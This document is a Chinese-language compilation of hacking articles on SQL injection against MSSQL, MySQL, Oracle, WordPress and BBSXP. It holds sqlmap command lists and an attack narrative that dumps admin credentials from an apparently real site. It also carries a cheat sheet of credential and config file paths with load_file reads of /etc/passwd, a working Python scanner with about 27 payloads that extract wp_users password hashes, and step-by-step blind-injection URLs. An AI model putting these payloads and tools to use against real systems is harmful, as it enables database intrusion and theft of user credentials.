python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --passwords -U sa -v 0查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --privileges -U postgres -v 0列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dbs -v 0列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --columns -T users -D test -v 1列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump -T users -D master -C surname -v 0指定列的范围从2-4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump -T users -D test --start 2 --stop 4 -v 0导出所有数据库,所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump-all -v 0只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump-all --exclude-sysdbs -v 0sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --sql-query “Select usename FROM pg_user” -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --sql-query “Select host, password FROM mysql.user LIMIT 1, 3” -v 1Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 --save

篇4:insert注入笔记脚本安全

Author:昆仑男银

群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘,

www.kunlun.com/nanyin.aspx?ProID=49579' 加一个点,报错

是insert类型的语句,百度了一下,对insert语句的注射大致有个了解,于是开始刺探信息。

提交:www.kunlun.com/nanyin.aspx?ProID=49579',cast(@@version/**/as/**/int),null);--

不兼容...把int换成varchar,页面返回正常。。。百度一下,原来是mssql不允许将text或ntext型数据直接转换为int型

要想爆出信息看来得找个varchar 或nvarchar类型的字段,把后面2个对换了一下位置,成功爆出。

提交:www.kunlun.com/nanyin.aspx?ProID=49579',null,cast(system_user/**/as/**/int));--

在将 nvarchar 值 'AFDataLogin' 转换成数据类型 int 时失败。

很好,再接着爆信息,收集的一些如下。

version:Microsoft SQL Server - 9.00.4035.00 (Intel X86)......Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

servername:SQL2005

host_name:IBM1

db_name:kunlun

user_name:dbo

可以看出 web与数据库分离,看来想差异备份或log备份是不行的了,只能爆后台帐号、密码进后台了。

先爆一下库,构造

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)--

修改第最后一个dbid的值,爆出13个库...

1:master

2:tempdb

3:model

4:msdb

5:kunlun_BBS

6:kunlun

7:New_AF

8:AF_Back

9:Console

10:Newkunlun

11:Newkunlun2

12:Oldkunlun

13:NewBBS

接下来爆表名

构造: www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype='u'))--

修改第二个top的值,从0递增上去,

爆第六张表时很开心,马上去爆字段、密码。

1:AF_UserAccount

2:YX_Unit

3:AF_UnionCompany

4:YX_FlashXZ

5:AF_UserPointLogs

6:Buy_Admin

爆指定表Buy_Admin的字段

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name='Buy_Admin')/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name='Buy_Admin')))--

爆出来了,一样是修改第二个top的值。

密码:af_APass

ID:af_ID

用户:af_AName

看到name和pass很开心啊,马上爆内容。

提交:

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)--

爆出来了,还是明文的,呵呵,找后台登录。

hjbadmin  hjbmanager

yck'     yck

高兴早了,怎么也登录不了。唉,再爆表把,爆到第N张,看见YX_Manage,开心了,这回没错了,爆字段爆内容

YX_AdminUser YX_Pwd

hgnadmin 50252EC697150CC9AA69A47333C716B8

可惜啊,md5解密不出....到这里差不多就结束了。很晚了。

哦,忘了说了,这个是dbo权限,呵呵。

篇5:mysql5.0注入原理脚本安全

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很 的事情,于是了解了一番。

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其

中记录了Mysql中所有

存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说

明。

1.得到所有数据库名:

|SCHEMATA ->存储数据库名的表

|—字段:SCHEMA_NAME ->数据库名称

|TABLES ->存储表名

|—字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名

|—字段:TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表

|—字段:TABLE_SCHEMA ->该字段所属数据库名

|—字段:TABLE_NAME ->存储所属表的名称

|—字段:COLUMN_NAME ->该字段的名称

#########################################################################

##

0×001 获取系统信息:

union select 1,2,3,4,5,concat

(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user

,0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

@@global.version_compile_os 获取系统版本

@@datadir 数据库路径

database() 当前数据库名称

0x3c62723e 换行HEX值

*/

######################################################################

0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from

information_schema.tables where table_schema=0x67617264656e /*

/*

0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from

information_schema.columns where table_name=0x61646d696e and

table_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/

#####################################################################

0×004 获取数据

union select 1,2,3

,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat

(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

*/

顺便添加一些mysql注入时非常有用的一些东西

简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名

2:user()       用户名

3:current_user() 当前用户名

4:session_user()连接数据库的用户名

5:database()   数据库名

6:version()    MYSQL数据库版本

7:load_file()  MYSQL读取本地文件的函数

8:@@datadir    读取数据库路径

9:@@basedir   MYSQL 安装路径

10:@@version_compile_os  操作系统 Windows Server ,

收集的一些路径:

WINDOWS下:

c:/boot.ini         //查看系统版本

c:/windows/php.ini  //php配置信息

c:/windows/my.ini   //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码

c:\Program Files\Serv-U\ServUDaemon.ini

c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件

c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码

c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件

//存储了pcAnywhere的登陆密码

c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看    WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf  //查看jsp开发的网站 resin文件配置信息.

c:/Resin/conf/resin.conf     /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

d:\APACHE\Apache2\conf\httpd.conf

C:\Program Files\mysql\my.ini

c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置

C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/usr/local/app/php5/lib/php.ini //PHP相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf // apache配置文件

/etc/rsyncd.conf //同步程序配置文件

/etc/my.cnf //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/issue.net

/usr/local/app/php5/lib/php.ini //PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0x2F6574632F706173737764),0x3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

篇6:WordPress 注入检查脚本脚本安全

#!/usr/bin/python

#WordPress SQL Injection Checker v1

#for md5's in the source will use

#http responses.

#   __ __    ___   ___

#___ __ \/ /______ __ \_____ /

#__ | / /_ /_ ___/ / / / __ /

#__ |/ /_ / / /__ / /_/ // /_/ /

#_____/ /_/ \___/ \____/ \__,_/

# www.vyc0d.uni.cc

# vyc0d[at]hackermail[dot]com

import sys, urllib2, re, time, httplib

#Bad HTTP Responses

BAD_RESP = [400,401,404]

def main(path):

try:

h = httplib.HTTP(host.split(“/”,1)[0])

h.putrequest(“HEAD”, “/”+host.split(“/”,1)[1]+path)

h.putheader(“Host”, host.split(“/”,1)[0])

h.endheaders()

resp, reason, headers = h.getreply()

return resp, reason, headers.get(“Server”)

except(), msg:

print “Error Occurred:”,msg

pass

def timer():

now = time.localtime(time.time())

return time.asctime(now)

print “\n\t WP SQL Injection Checker v1”

print “\t-----------------------------”

print “\t  vYc0d - M0slem Hax0r”

sqls = [“index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*”,

“index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*”,

“index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23”,

“index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*”,

“wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--”,

“wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--”,

“wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users”,

“wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users”,

“wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users”,

“sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*”,

“sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*”,

“forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*”,

“index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201”,

“wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*”,

“wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain”,

“wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*”,

“myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*”,

“?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2”,

“wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2”,

“?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*”,

“wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*”,

“?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*”,

“wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*”,

“mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--”,

“wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--”,

“wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain”,

“wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*”]

if len(sys.argv) != 2:

print “\nUsage: ./wpsqli.py

print “Example: ./wpsqli.py www.site.com/\n”

sys.exit(1)

host = sys.argv[1].replace(“”,“”).rsplit(“/”,1)[0]

if host[-1] != “/”:

host = host+“/”

print “\n[!] Site:”,host

print “[!] SQL Loaded:”,len(sqls)

server = main(“/”)[2]

print “[!] Server:”,server

print “\n[!] Started:”,timer()

print “\n[!] Scanning: SQL\n”

for sql in sqls:

time.sleep(2)

print “[+] Trying:”,sql.replace(“\n”,“”)

try:

source = urllib2.urlopen(“”+host+sql.replace(“\n”,“”)).read()

md5s = re.findall(“[a-f0-9]”*32,source)

if len(md5s) >= 1:

print “[!]”,host+sql.replace(“\n”,“”)

for md5 in md5s:

print “\n\t[!]Hash to MD5:”,md5

except(urllib2.HTTPError):

pass

print “\n[-] Done\n”

篇7:BBSXP,很多注入

By:sobiny[B.C.T]

提交给BBSXP的漏洞公告,官方一点反映都没呢,。

其实主要是他们一个类型的注入太多了。

我都不好意思发出来,发多了手痛。

哎,举例一个。

Search.asp文件

127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149

if Request(“menu”)=“Result” then

Keywords=HTMLEncode(Request(“Keywords”))

SortBy=HTMLEncode(Request(“SortBy”))

Item=HTMLEncode(Request(“Item”))

if Keywords=“” then error(“您没有输入任何查询条件!”)

if Request(“VerifyCode”)Session(“VerifyCode”) or Session(“VerifyCode”)=“” then

error(“验证码错误!”)

SQLSearch=“IsApproved=1 and IsDel=0 and ”&Item&“ like '%”&Keywords&“%' ”

if DateComparer >0 then SQLSearch=SQLSearch&“ and

PostTime>”&SqlNowString&“-”&DateComparer&“ ”

if ForumID >0 then SQLSearch=SQLSearch&“ and ForumID=”&ForumID&“ ”

sql=“select * from [BBSXP_Threads] where ”&SQLSearch&“ order by ThreadID

”&SortBy&“”

Rs.Open sql,Conn,1

……………………

篇8:JSP+ORACLE注入方法v1.0脚本安全

大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:),

首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。

首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:

下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:

1、 判断注入类型(数字型还是字符型)

字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And user

www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And user

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)

出现正常的页面:

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER

2、 猜解表数量和表名

数据库数量为3:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

以下为猜解数据表数量

数据表第一位为:1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

数据表第二位为:3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

数据表第三位为:1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

共有131个数据表,见上图。

以下为猜解表名称:

以下为判断第一个表的长度为:2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

